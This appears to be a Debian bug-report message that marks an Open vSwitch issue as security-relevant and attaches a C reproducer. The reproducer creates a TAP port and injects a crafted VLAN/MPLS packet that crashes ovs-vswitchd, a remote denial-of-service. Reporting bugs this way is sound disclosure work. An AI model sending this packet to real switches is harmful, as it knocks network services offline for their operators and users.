Control: tag -1 + security
Simple reproducer attached.
This is a remote DoS vector in jessie, so adding the security tag.
--
Thanks,
Feri
/* ovs-vsctl add-br ovsbr
* then this crashes ovs-vswitchd (which restarts automatically)
*/
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <net/if.h>
#include <sys/ioctl.h>
#include <linux/if_tun.h>
static const unsigned char pkt1[64] = {
0x8c, 0x60, 0x4f, 0x03, 0x9c, 0xc1, 0x20, 0x1a,
0x06, 0x9a, 0xa0, 0x3c, 0x81, 0x00, 0x03, 0x21,
0x88, 0x47, 0x00, 0x06, 0x91, 0xff, 0x45, 0x00,
0x00, 0x28, 0xa0, 0x86, 0x00, 0x00, 0xfe, 0x06,
0xd1, 0xef, 0xc3, 0x6f, 0x61, 0xc8, 0xc3, 0x6f,
0x61, 0xb2, 0xec, 0x8a, 0x02, 0x86, 0x66, 0x1b,
0x5b, 0xd8, 0x52, 0x02, 0x42, 0xc0, 0x50, 0x10,
0xc0, 0x00, 0x5f, 0xb3, 0x00, 0x00, 0x00, 0x00
};
int main (void) {
struct ifreq ifr;
int fd, err;
const char *clonedev = "/dev/net/tun";
if ((fd = open (clonedev, O_RDWR)) < 0) {
perror ("open clonedev");
return fd;
}
memset (&ifr, 0, sizeof ifr);
ifr.ifr_flags = IFF_TAP;
strncpy (ifr.ifr_name, "killer", IFNAMSIZ);
if ((err = ioctl (fd, TUNSETIFF, &ifr)) < 0) {
perror ("TUNSETIFF");
close (fd);
return err;
}
err = system ("ovs-vsctl add-port ovsbr killer && ip link set killer up");
printf ("Port added: %d\nPress Enter\n", err);
fread (&err, 1, 1, stdin);
err = write (fd, pkt1, sizeof pkt1);
printf ("Packet written: %d bytes\nPress Enter\n", err);
fread (&err, 1, 1, stdin);
system ("ovs-vsctl del-port ovsbr killer");
}
